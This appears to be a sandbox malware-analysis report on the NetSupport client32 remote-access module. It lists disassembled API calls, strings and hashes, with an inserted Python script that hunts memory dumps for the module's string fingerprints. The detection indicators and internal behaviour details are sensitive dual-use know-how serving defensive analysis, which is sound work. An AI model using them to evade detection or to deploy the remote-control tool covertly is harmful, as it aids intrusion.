                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                                                                    • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                                                                    • API String ID: 83693535-2077998243
                                                                                                                                                                                                    • Opcode ID: d7bfc1230df4fb0b39081723e2fa8acaf563a561e877368a5726300d8e723dbb
                                                                                                                                                                                                    • Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7bfc1230df4fb0b39081723e2fa8acaf563a561e877368a5726300d8e723dbb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51
APIs
• _strtok.LIBCMT ref: 11026896
• _strtok.LIBCMT ref: 110268D0
• Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• API ID: _strtok$Sleep
• String ID: *max_sessions$@r$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
• API String ID: 2009458258-3431504079
• Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
• Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
• Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
• Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
APIs
• __set_flsgetvalue.MSVCR100(687E1DE0,00000008,687E1E16,00000001,?), ref: 687E1D6A
  • Part of subcall function 687E0341: TlsGetValue.KERNEL32(?,687E0713), ref: 687E034A
• TlsGetValue.KERNEL32(687E1DE0,00000008,687E1E16,00000001,?), ref: 687E1D7B
• _calloc_crt.MSVCR100(00000001,00000214), ref: 687E1D8E
• DecodePointer.KERNEL32(00000000), ref: 687E1DAC
• _initptd.MSVCR100(00000000,00000000), ref: 687E1DBE
  • Part of subcall function 687E1E9B: GetModuleHandleW.KERNEL32(KERNEL32.DLL,687E1F38,00000008,688075E9,00000000,00000000), ref: 687E1EAC
  • Part of subcall function 687E1E9B: _lock.MSVCR100(0000000D), ref: 687E1EE0
  • Part of subcall function 687E1E9B: InterlockedIncrement.KERNEL32(?), ref: 687E1EED
  • Part of subcall function 687E1E9B: _lock.MSVCR100(0000000C), ref: 687E1F01
• GetCurrentThreadId.KERNEL32 ref: 687E1DC5
• __freeptd.LIBCMT ref: 687E2971
• __heap_init.LIBCMT ref: 687EB8B1
• GetCommandLineA.KERNEL32(687E1DE0,00000008,687E1E16,00000001,?), ref: 687EB8E2
• GetCommandLineW.KERNEL32 ref: 687EB8ED
• __ioterm.LIBCMT ref: 687F7B7E
• free.MSVCR100(00000000), ref: 68807485
Memory Dump Source
• Source File: 00000007.00000002.4097447824.00000000687D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 687D0000, based on PE: true
• Associated: 00000007.00000002.4097426862.00000000687D0000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097511143.0000000068884000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097532016.0000000068886000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000007.00000002.4097551046.0000000068889000.00000002.00000001.01000000.0000000E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_687d0000_client32.jbxd
Similarity
• API ID: CommandLineValue_lock$CurrentDecodeHandleIncrementInterlockedModulePointerThread__freeptd__heap_init__ioterm__set_flsgetvalue_calloc_crt_initptdfree
• String ID:
• API String ID: 2121586863-0
• Opcode ID: 0c9c981bd24189ebf4bfc0c2e1169a0c0b6679ad87c4d2ec4b890586b33d8893
• Instruction ID: c565353fb3ec03c29bf6ec110e6dccc42e152edcce28fd538532ed449f422d66
• Opcode Fuzzy Hash: 0c9c981bd24189ebf4bfc0c2e1169a0c0b6679ad87c4d2ec4b890586b33d8893
• Instruction Fuzzy Hash: 6231BE79488741DADB117BBE8B4E53D3AB4EF4739ABE00936F469D9140DF3180428AB2
APIs
• wsprintfA.USER32 ref: 1112FCF0
• GetTickCount.KERNEL32 ref: 1112FD21
• SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
• GetTickCount.KERNEL32 ref: 1112FD3C
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Similarity
• API ID: CountTick$FolderPathwsprintf
• String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
• API String ID: 1170620360-4157686185
• Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
• Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
• Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
• Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                                                                                      • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                                                                                      • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                                                                                                      • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                                                                                                      • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                                                                                                      • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                                                                                                    • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                                                                                                    • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(00728D58,00001388), ref: 11030746
                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                                                                                                    • _sprintf.LIBCMT ref: 1103078D
                                                                                                                                                                                                    • _setlocale.LIBCMT ref: 11030797
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
• String ID: .%d$Error %s unloading audiocap dll$pcicl32
• API String ID: 3430446287-3899566344
• Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
• Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
• Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
• Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
APIs
• GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
• RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
• _memset.LIBCMT ref: 1114179D
  • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
• _strncpy.LIBCMT ref: 1114186A
  • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
• RegCloseKey.KERNEL32(00000000), ref: 11141906
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
• String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
• API String ID: 3299820421-2117887902
• Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
• Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
• Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
• Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,685A67B5), ref: 68598D6B
  • Part of subcall function 68594F70: LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78
• GetCurrentProcessId.KERNEL32 ref: 68598DCB
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 68598DD8
• FreeLibrary.KERNEL32(?), ref: 68598EBF
  • Part of subcall function 68594FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
  • Part of subcall function 68594FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
• CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
  • Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
  • Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
  • Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E
Strings
Memory Dump Source
• Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_68590000_client32.jbxd
Yara matches
Similarity
• API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
• String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
• API String ID: 2714439535-3484705551
• Opcode ID: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
• Instruction ID: ab8864ea8cf839c0dac882c909dfb3055c68c0a934503256c46ccfb76580efe1
• Opcode Fuzzy Hash: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
• Instruction Fuzzy Hash: C841F8759402599BEF10DB59DC55FFEB378EB45704FC00095EE29A2240EB319E84CF62
APIs
  • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
• GetCurrentThreadId.KERNEL32 ref: 110FFE7C
• GetThreadDesktop.USER32(00000000), ref: 110FFE83
• OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
• SetThreadDesktop.USER32(00000000), ref: 110FFEA0
• CloseDesktop.USER32(00000000), ref: 110FFEB9
• GetLastError.KERNEL32 ref: 110FFEC1
• CloseDesktop.USER32(00000000), ref: 110FFED7
• GetLastError.KERNEL32 ref: 110FFEDF
Strings
• SetThreadDesktop(%s) ok, xrefs: 110FFEAB
• SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
• OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
• String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
• API String ID: 2036220054-60805735
• Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
• Instruction ID: 156f0d79109f07c40c4ac8670e692553d53260d930ebdb42a1d89f925a608cc0
• Opcode Fuzzy Hash: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
• Instruction Fuzzy Hash: 9811947AF0022767D2116FB06C89B6FBA18AF8561DF104038FA1B85581EF24A94483F3
APIs
• GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115ABA8
• GetLastError.KERNEL32 ref: 1115ABB5
• wsprintfA.USER32 ref: 1115ABC8
  • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
  • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
  • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
  • Part of subcall function 110290F0: _strrchr.LIBCMT ref: 110291E5
  • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 11029224
• GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115AC0C
• GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115AC19
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
• String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
• API String ID: 1734919802-1728070458
• Opcode ID: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
• Instruction ID: 447bd79fb7e316194c8fbcf3240c79f01d8f25fe8b238cd57140670aacafd43f
• Opcode Fuzzy Hash: 60df89256fdbe4fb07ae3e45b32be970c36e3097d10c8cf2f3f63e8d74a38f38
• Instruction Fuzzy Hash: 7811C475D01319AFC720EFFA9DC09AAF7B8FF01319B40462EE56653540EA7095408B5A
APIs
  • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
  • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
• std::exception::exception.LIBCMT ref: 1110D0CA
• __CxxThrowException@8.LIBCMT ref: 1110D0DF
• GetCurrentThreadId.KERNEL32 ref: 1110D0F6
• InitializeCriticalSection.KERNEL32(-00000010,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D109
• InitializeCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57,00000001,000003F0), ref: 1110D118
• EnterCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D12C
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,?,11026F57), ref: 1110D152
• LeaveCriticalSection.KERNEL32(111EC8A0,?,000000FF,?,11026F57), ref: 1110D1DF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_memsetstd::exception::exceptionwsprintf
• String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
• API String ID: 144328431-1024648535
• Opcode ID: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
• Instruction ID: 09a7b7f2a39b786243c3074fc4a04aff0e2c3ee4e0c0e7a142bf3ec4b628a9f7
• Opcode Fuzzy Hash: ec2df561275c0d64ba6d257a16c8b5c35912085c7d85a207c9b9c2d87efd88b9
• Instruction Fuzzy Hash: F941C075E01315ABDB12CFA98D84BAEFBE4FB88718F54852AE819D3244E731A5008B51
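The three function fingerprints above (desktop switching via OpenDesktop/SetThreadDesktop, the NSMWndClass/NSMReflect/NSMDropTarget atoms registered from ..\ctl32\wndclass.cpp, and the QueueThreadEvent path in ..\ctl32\Refcount.cpp) are stable strings in the client32 image and are the practical handle for hunting the same module in other memory dumps. The scanner below is an added example written for this report; it is not Joe Sandbox or NetSupport code. The indicator strings are copied from the String IDs listed above, the sample buffer is constructed here so the script runs offline, and the "three distinct indicators" threshold is an assumption rather than a published rule.

```python
"""Hunt for NetSupport client32 function-level string fingerprints in a memory dump.

Added example for this report (not Joe Sandbox or NetSupport code). The indicator
strings come from the String IDs of the disassembled client32 functions above;
the sample buffer is constructed and the detection threshold is an assumption.
"""
from __future__ import annotations

from collections import defaultdict
from pathlib import Path

# Indicators taken from the String IDs of the disassembled functions above.
INDICATORS = {
    # ..\ctl32\wndclass.cpp: window-class atoms registered via GlobalAddAtomA
    "NSMWndClass",
    "NSMReflect",
    "NSMDropTarget",
    "..\\ctl32\\wndclass.cpp",
    "GlobalAddAtom failed, e=%d",
    # ..\ctl32\Refcount.cpp: thread event queue
    "..\\ctl32\\Refcount.cpp",
    "QueueThreadEvent",
    # desktop switching used to drive the interactive desktop remotely
    "OpenDesktop(%s) failed, e=%d",
    "SetThreadDesktop(%s) failed, e=%d",
    "SetThreadDesktop(%s) ok",
}


def encodings(s: str) -> dict[str, bytes]:
    # client32 mixes wsprintfA and wsprintfW, so search both ANSI and UTF-16LE forms.
    return {"ansi": s.encode("ascii"), "utf16le": s.encode("utf-16-le")}


def find_all(haystack: bytes, needle: bytes) -> list[int]:
    """All (possibly overlapping) offsets of needle in haystack."""
    offsets, start = [], 0
    while (i := haystack.find(needle, start)) != -1:
        offsets.append(i)
        start = i + 1
    return offsets


def scan(buffer: bytes) -> dict[str, list[tuple[str, int]]]:
    """Map each indicator found to its (encoding, offset) hits."""
    hits: dict[str, list[tuple[str, int]]] = defaultdict(list)
    for indicator in sorted(INDICATORS):
        for enc_name, needle in encodings(indicator).items():
            for off in find_all(buffer, needle):
                hits[indicator].append((enc_name, off))
    return dict(hits)


def verdict(buffer: bytes, min_distinct: int = 3) -> tuple[bool, int]:
    """Flag a buffer when at least min_distinct different indicators are present.

    Requiring several distinct strings (an assumed threshold) avoids firing on a
    single generic token such as an error-message format string.
    """
    hits = scan(buffer)
    return len(hits) >= min_distinct, len(hits)


def scan_file(path: str | Path, min_distinct: int = 3) -> tuple[bool, int]:
    """Apply verdict() to a dump on disk, e.g. an extracted .sdmp file."""
    return verdict(Path(path).read_bytes(), min_distinct)


# Constructed sample: padding around a few of the strings, one of them as UTF-16LE.
SAMPLE = (
    b"\x00" * 16 + b"NSMWndClass\x00" + b"\x90" * 8
    + b"..\\ctl32\\wndclass.cpp\x00"
    + "SetThreadDesktop(%s) ok".encode("utf-16-le") + b"\x00" * 8
)

if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else None
    data = Path(target).read_bytes() if target else SAMPLE
    for name, where in scan(data).items():
        print(f"{name!r}: {where}")
    flagged, n = verdict(data)
    print(f"flagged={flagged} distinct_indicators={n}")
```

Run it against one of the .sdmp files listed under Memory Dump Source to confirm the same fingerprints, or against dumps from another host to hunt for the same client32 build; a hit on only one string (the error-message formats in particular) is weak evidence on its own, which is why the verdict counts distinct indicators rather than raw matches.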
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,24DE4E77,?,00000000,00000001), ref: 11158267
• CoCreateInstance.OLE32(111C06FC,00000000,00000017,111C062C,?), ref: 11158287
• wsprintfW.USER32 ref: 111582A7
• SysAllocString.OLEAUT32(?), ref: 111582B3
• wsprintfW.USER32 ref: 11158367
• SysFreeString.OLEAUT32(?), ref: 11158408
Strings
Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
• String ID: SELECT * FROM %s$WQL$root\CIMV2
• API String ID: 3050498177-823534439
• Opcode ID: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
• Instruction ID: 5c9d69ea3c7034288904af0a1b42e56c7497ab7ebaebdabd712d66f14354dd8e
• Opcode Fuzzy Hash: 201d508ae0e233346d067116be793b91e5c0e3a726f34fbff0a0ba0680b7bfee
• Instruction Fuzzy Hash: 3A517071B00219AFD7A0DB69CC94F9BF7B9FB8A714F1042A9E819D7251D630AE40CF51
APIs
• CoInitialize.OLE32(00000000), ref: 11112B55
• CoCreateInstance.OLE32(111BBF3C,00000000,00000001,111BBF4C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104B1EB), ref: 11112B6F
